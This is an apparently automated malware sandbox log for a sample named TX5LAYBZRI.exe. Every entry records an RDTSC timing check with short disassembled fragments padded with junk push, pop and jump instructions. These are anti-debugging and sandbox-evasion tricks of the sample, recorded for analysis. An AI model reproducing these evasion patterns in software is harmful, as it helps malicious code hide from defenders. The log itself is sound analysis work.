Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EAECC second address: 14EAED6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF108C7BF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E97D0 second address: 14E97DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E97DE second address: 14E980E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF108C7BF06h 0x00000008 jc 00007FF108C7BF06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnl 00007FF108C7BF20h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EABEA second address: 14EABF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDE83 second address: 14EDE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFBE second address: 14EDFCB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFCB second address: 14EDFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFD1 second address: 14EDFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFD7 second address: 14EDFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFDC second address: 14EE002 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FF10887397Dh 0x00000008 jmp 00007FF10887397Dh 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FF108873976h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE1A4 second address: 14EE1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF108C7BF18h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE1C6 second address: 14EE1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF10887397Eh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE34D second address: 14EE352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE352 second address: 14EE368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Fh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE64C second address: 14EE668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF14h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE668 second address: 14EE66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE66C second address: 14EE670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F4208 second address: 14F423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108873980h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b js 00007FF108873984h 0x00000011 jmp 00007FF10887397Ch 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jc 00007FF108873976h 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F4E86 second address: 14F4E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F4E8A second address: 14F4E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F5162 second address: 14F5178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F5178 second address: 14F5184 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF108873976h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54A1 second address: 14F54A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54A9 second address: 14F54AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54AF second address: 14F54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54B3 second address: 14F54D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF108873980h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jne 00007FF108873976h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54D5 second address: 14F54DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FB68C second address: 14FB699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF108873976h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FB699 second address: 14FB6A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FB6A5 second address: 14FB6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FB6A9 second address: 14FB6C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FCDDD second address: 14FCDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FCDE3 second address: 14FCE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF108C7BF14h 0x0000000b jmp 00007FF108C7BF0Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FF108C7BF0Fh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pop edx 0x0000001c jmp 00007FF108C7BF0Bh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500A67 second address: 1500A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 ja 00007FF108873976h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500A76 second address: 1500A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500A7B second address: 1500A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500A81 second address: 1500A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FFD49 second address: 14FFD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FFE9B second address: 14FFED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF11h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF108C7BF15h 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF108C7BF0Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500366 second address: 1500375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FF10887397Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500375 second address: 150037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 150037B second address: 150037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 150049A second address: 15004A4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF108C7BF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 15004A4 second address: 15004B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FF108873976h 0x0000000d jne 00007FF108873976h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500785 second address: 15007D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF108C7BF06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FF108C7BF14h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007FF108C7BF18h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 popad 0x00000021 push edi 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pop edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1501F91 second address: 1501F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1501F95 second address: 1501F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1501F99 second address: 1501F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1509384 second address: 15093A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FF108C7BF2Eh 0x0000000f jbe 00007FF108C7BF20h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 150AF30 second address: 150AF4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873984h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151064B second address: 1510654 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 151C8AC second address: 151C8CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FF108873976h 0x0000000f jmp 00007FF108873981h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 151C8CD second address: 151C8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FF108C7BF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 151C8D7 second address: 151C8FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF108873988h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 151C8FC second address: 151C900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 151F9B2 second address: 151F9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 151F9B7 second address: 151F9D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF19h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 151F562 second address: 151F57E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873987h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1529713 second address: 152972C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF13h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 152972C second address: 1529730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153059B second address: 153059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153059F second address: 15305A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 15305A5 second address: 15305B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF108C7BF0Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1533727 second address: 153372D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1538E56 second address: 1538E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 15399F5 second address: 15399FF instructions: 0x00000000 rdtsc 0x00000002 js 00007FF108873976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153C070 second address: 153C074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153C074 second address: 153C083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007FF108873976h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153C083 second address: 153C099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FF108C7BF0Ch 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153C099 second address: 153C09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153C09F second address: 153C0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jnl 00007FF108C7BF06h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153C0B7 second address: 153C0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873983h 0x00000009 jno 00007FF108873976h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153C0D4 second address: 153C0D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 153E793 second address: 153E7BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FF108873976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108873989h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 157BE6B second address: 157BE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1455DA9 second address: 1455DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1455DAD second address: 1455DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 158DCC5 second address: 158DCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 158DCCB second address: 158DCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 158F8A3 second address: 158F8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 158F8A9 second address: 158F91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF19h 0x00000009 jmp 00007FF108C7BF18h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FF108C7BF12h 0x00000015 push edx 0x00000016 pop edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF108C7BF18h 0x00000022 jnp 00007FF108C7BF08h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 158FA72 second address: 158FA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 16625A0 second address: 16625AA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF108C7BF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 16625AA second address: 16625B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 16625B0 second address: 16625B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1662786 second address: 16627B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF108873984h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 16627B4 second address: 16627C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 166286A second address: 166286E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1663C81 second address: 1663C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1663C85 second address: 1663C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF108873976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1665539 second address: 1665540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950019 second address: 7950022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, FB3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950167 second address: 795016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795016C second address: 7950187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, al 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF10887397Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950187 second address: 79501E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108C7BF0Fh 0x00000009 jmp 00007FF108C7BF13h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FF108C7BF18h 0x00000015 adc eax, 4A1C4298h 0x0000001b jmp 00007FF108C7BF0Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 xchg eax, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov esi, ebx 0x0000002a movsx edi, ax 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79501E6 second address: 79501FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873984h 0x00000009 rdtsc
